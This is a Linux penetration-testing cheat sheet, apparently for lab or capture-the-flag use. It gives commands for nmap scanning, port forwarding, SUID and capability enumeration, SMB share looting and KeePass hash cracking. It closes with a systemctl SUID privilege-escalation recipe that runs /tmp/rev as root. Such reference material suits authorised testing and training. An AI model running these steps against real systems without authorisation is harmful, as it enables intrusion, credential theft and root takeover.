Linux Cheat-Sheet
What’s here ?
- Some essential enum things. :smile:
Enum scripts/bins:
- Linenum.sh
- pspy, detect cronjobs
- nmap static binary
- ncat static binary
- pspy64 static binary
- pspy static binary
General
host discovery:
nmap -sP 10.10.10.0/24
Port scanning:
normal scan:
nmap -sC -sV -p- "target ip" -o output.txt
Connect scan (Useful with proxychains):
proxychains nmap -sT -p- "target ip" -o output.txt
Note, the full port “-p-“ its so damn slow, same as udp.
UDP scan:
nmap -sU "target ip" -o output.txt
Port forwarding:
Local port forwarding:
ssh -L 5555:remote_address:remote_port user@remote_ip
Meterpreter version:
portfwd add -l "localport" -p "remoteport" -r "target host"
Remote port forwarding:
ssh -R 5555:local_address:local_port user@remote_ip
Dynamic forwarding:
ssh -D "localport" user@remote_ip
Socat version:
socat tcp-listen:8080,reuseaddr,fork tcp:"target ip":9001
Binaries with special Capabilities:
find / -type f -print0 2>/dev/null | xargs -0 getcap 2>/dev/null
alternative
/sbin/getcap -r / 2>/dev/null
fast smtp server:
sudo python -m smtpd -n -c DebuggingServer 0.0.0.0:25
SUID Binaries:
find / -perm -u=s 2>/dev/null
Sudo check:
sudo -l
Check ifopen files:
fuser "filename"
lsof
NFS Shares:
If you mount an NFS share, you can abuse the sared files, impersonating the UID, of the owner on the remote box.
mount -t nfs user@remoteip:/path /mount/point
SMB things:
List samba shares:
smbclient -L \\\\ip
smbmap -H ip -u user -p password
Connect to a share:
smbclient \\\\ip\\share_name -U "user"%"password"
Download everything, rolf:
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Mount a remote smbshare:
mount -t cifs '//remote_ip/share' /mount/point
Create a Simple SBMServer:
smbserver.py -smb2support sharename $PWD
KeePass files
If you find a keepass database (.kdbx), it can be encrypted with a master key or with a file as one, To crack it:
keepass2john -k MASTER.file file.kdbx >> hash.txt
john --wordlist=wordlist hash.txt
kpcli --kdb file.kdbx --key MASTER.file
systemctl as suid bin:*
Create a custom service definition:
echo '[Service]
Type=oneshot
ExecStart=/bin/bash /tmp/rev
[Install]
WantedBy=multi-user.target' > /tmp/.fade/fserv3.service
systemctl link /tmp/.fade/fserv3.service
systemctl start fserv3
The /tmp/rev will be executed as root at startup :) !